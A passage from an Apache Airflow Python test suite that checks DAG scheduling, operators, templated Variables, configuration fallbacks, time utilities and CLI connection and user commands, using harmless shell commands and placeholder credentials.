msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
Test scheduling a dag where there is a prior DagRun
which has the same run_id as the next run should have
"""
delta = timedelta(hours=1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous',
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
dag.create_dagrun(run_id=models.DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = scheduler.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
DEFAULT_DATE + delta,
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_once')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_start_end_dates',
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
@freeze_time('2016-01-01')
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
start_date = DEFAULT_DATE
runs = 365
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only',
start_date=start_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_run = scheduler.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(configuration.conf.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
with warnings.catch_warnings(record=True) as w:
t = BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertTrue(
issubclass(w[0].category, PendingDeprecationWarning))
self.assertIn(
'Invalid arguments were passed to BashOperator.',
w[0].message.args[0])
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command=u"echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_trigger_dagrun(self):
def trigga(context, obj):
if True:
return obj
t = TriggerDagRunOperator(
task_id='test_trigger_dagrun',
trigger_dag_id='example_bash_operator',
python_callable=trigga,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
provide_context=True,
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_variable(self):
"""
Test the availability of variables in templates
"""
val = {
'test_value': 'a test value'
}
Variable.set("a_variable", val['test_value'])
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable(self):
"""
Test the availability of variables (serialized as JSON) in templates
"""
val = {
'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value']['obj']['v2'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.json.a_variable.obj.v2 }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable_as_value(self):
"""
Test the availability of variables (serialized as JSON) in templates, but
accessed as a value
"""
val = {
'test_value': {'foo': 'bar'}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
u'{"foo": "bar"}')
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject(object):
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_import_examples(self):
self.assertEqual(len(self.dagbag.dags), NUM_EXAMPLE_DAGS)
def test_local_task_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_doctests(self):
modules = [utils, macros]
for mod in modules:
failed, tests = doctest.testmod(mod)
if failed:
raise Exception("Failed a doctest")
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Happiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Happiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
# Check that both the returned value and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_parameterized_config_gen(self):
cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
configuration.conf.set("core", "FERNET_KEY_CMD", "printf HELLO")
FALLBACK_FERNET_KEY = configuration.conf.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
# restore the conf back to the original state
configuration.conf.remove_option("core", "FERNET_KEY_CMD")
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get("core", "FERNET_KEY")
configuration.conf.remove_option("core", "FERNET_KEY")
with self.assertRaises(AirflowConfigException) as cm:
configuration.conf.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
# restore the conf back to the original state
configuration.conf.set("core", "FERNET_KEY", FERNET_KEY)
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_array_almost_equal from numpy.testing since we are
# comparing floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_duplicate_dependencies(self):
regexp = "Dependency (.*)runme_0(.*)run_after_loop(.*) " \
"already registered"
with self.assertRaisesRegexp(AirflowException, regexp):
self.runme_0.set_downstream(self.run_after_loop)
with self.assertRaisesRegexp(AirflowException, regexp):
self.run_after_loop.set_upstream(self.runme_0)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existant",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state gets deleted, it should fail"""
TI = models.TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
p_fails = session.query(models.TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(models.TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
print(f_fails)
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
# the failed task should have run for at least its 3 second execution_timeout
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_dag_stats(self):
"""Correctly sets/dirties/cleans rows of DagStat table"""
session = settings.Session()
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
models.DagStat.update([], session=session)
run1 = self.dag_bash.create_dagrun(
run_id="run1",
execution_date=DEFAULT_DATE,
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 1)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
run2 = self.dag_bash.create_dagrun(
run_id="run2",
execution_date=DEFAULT_DATE + timedelta(days=1),
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 2)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
session.query(models.DagRun).first().state = State.SUCCESS
session.commit()
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.SUCCESS).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.SUCCESS, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.RUNNING).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.RUNNING, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
session.close()
def test_run_command(self):
if six.PY3:
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
else:
write = r'sys.stdout.write(u"\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)),
u'\u1000foo' if six.PY3 else 'foo')
self.assertEqual(run_command('echo "foo bar"'), u'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
class CliTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(CliTests, cls).setUpClass()
cls._cleanup()
def setUp(self):
super(CliTests, self).setUp()
configuration.load_test_config()
app = application.create_app()
app.config['TESTING'] = True
self.parser = cli.CLIFactory.get_parser()
self.dagbag = models.DagBag(dag_folder=DEV_NULL, include_examples=True)
self.session = Session()
def tearDown(self):
self._cleanup(session=self.session)
super(CliTests, self).tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(models.Pool).delete()
session.query(models.Variable).delete()
session.commit()
session.close()
def test_cli_list_dags(self):
args = self.parser.parse_args(['list_dags', '--report'])
cli.list_dags(args)
def test_cli_create_user_random_password(self):
args = self.parser.parse_args([
'create_user', '-u', 'test1', '-l', 'doe', '-f', 'jon',
'-e', 'jdoe@foo.com', '-r', 'Viewer', '--use_random_password'
])
cli.create_user(args)
def test_cli_create_user_supplied_password(self):
args = self.parser.parse_args([
'create_user', '-u', 'test2', '-l', 'doe', '-f', 'jon',
'-e', 'jdoe@apache.org', '-r', 'Viewer', '-p', 'test'
])
cli.create_user(args)
def test_cli_list_tasks(self):
for dag_id in self.dagbag.dags.keys():
args = self.parser.parse_args(['list_tasks', dag_id])
cli.list_tasks(args)
args = self.parser.parse_args([
'list_tasks', 'example_bash_operator', '--tree'])
cli.list_tasks(args)
@mock.patch("airflow.bin.cli.db_utils.initdb")
def test_cli_initdb(self, initdb_mock):
cli.initdb(self.parser.parse_args(['initdb']))
initdb_mock.assert_called_once_with(False)
@mock.patch("airflow.bin.cli.db_utils.resetdb")
def test_cli_resetdb(self, resetdb_mock):
cli.resetdb(self.parser.parse_args(['resetdb', '--yes']))
resetdb_mock.assert_called_once_with(False)
def test_cli_connections_list(self):
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(['connections', '--list']))
stdout = mock_stdout.getvalue()
conns = [[x.strip("'") for x in re.findall("'\w+'", line)[:2]]
for ii, line in enumerate(stdout.split('\n'))
if ii % 2 == 1]
conns = [conn for conn in conns if len(conn) > 0]
# Assert that some of the connections are present in the output as
# expected:
self.assertIn(['aws_default', 'aws'], conns)
self.assertIn(['beeline_default', 'beeline'], conns)
self.assertIn(['emr_default', 'emr'], conns)
self.assertIn(['mssql_default', 'mssql'], conns)
self.assertIn(['mysql_default', 'mysql'], conns)
self.assertIn(['postgres_default', 'postgres'], conns)
self.assertIn(['wasb_default', 'wasb'], conns)
self.assertIn(['segment_default', 'segment'], conns)
# Attempt to list connections with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--list', '--conn_id=fake', '--conn_uri=fake-uri',
'--conn_type=fake-type', '--conn_host=fake_host',
'--conn_login=fake_login', '--conn_password=fake_password',
'--conn_schema=fake_schema', '--conn_port=fake_port', '--conn_extra=fake_extra']))
stdout = mock_stdout.getvalue()
# Check list attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--list flag: ['conn_id', 'conn_uri', 'conn_extra', " +
"'conn_type', 'conn_host', 'conn_login', " +
"'conn_password', 'conn_schema', 'conn_port']"),
])
def test_cli_connections_list_redirect(self):
cmd = ['airflow', 'connections', '--list']
with tempfile.TemporaryFile() as fp:
p = subprocess.Popen(cmd, stdout=fp)
p.wait()
self.assertEqual(0, p.returncode)
def test_cli_connections_add_delete(self):
# Add connections:
uri = 'postgresql://airflow:airflow@host:5432/airflow'
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new2',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new3',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new4',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new5',
'--conn_type=hive_metastore', '--conn_login=airflow',
'--conn_password=airflow', '--conn_host=host',
'--conn_port=9083', '--conn_schema=airflow']))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new6',
'--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
stdout = mock_stdout.getvalue()
# Check addition stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tSuccessfully added `conn_id`=new1 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new2 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new3 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new4 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new5 : " +
"hive_metastore://airflow:airflow@host:9083/airflow"),
("\tSuccessfully added `conn_id`=new6 : " +
"google_cloud_platform://:@:")
])
# Attempt to add duplicate
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tA connection with `conn_id`=new1 already exists",
])
# Attempt to add without providing conn_id
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_id']"),
])
# Attempt to add without providing conn_uri
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new']))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_uri or conn_type']"),
])
# Prepare to verify the connections added above
session = settings.Session()
extra = {'new1': None,
'new2': None,
'new3': "{'extra': 'yes'}",
'new4': "{'extra': 'yes'}"}
# Verify the added connections
for index in range(1, 6):
conn_id = 'new%s' % index
result = (session
.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
result = (result.conn_id, result.conn_type, result.host,
result.port, result.get_extra())
if conn_id in ['new1', 'new2', 'new3', 'new4']:
self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
extra[conn_id]))
elif conn_id == 'new5':
self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
9083, None))
elif conn_id == 'new6':
self.assertEqual(result, (conn_id, 'google_cloud_platform',
None, None, "{'extra': 'yes'}"))
# Delete connections
with mock.patch('sys.stdout',
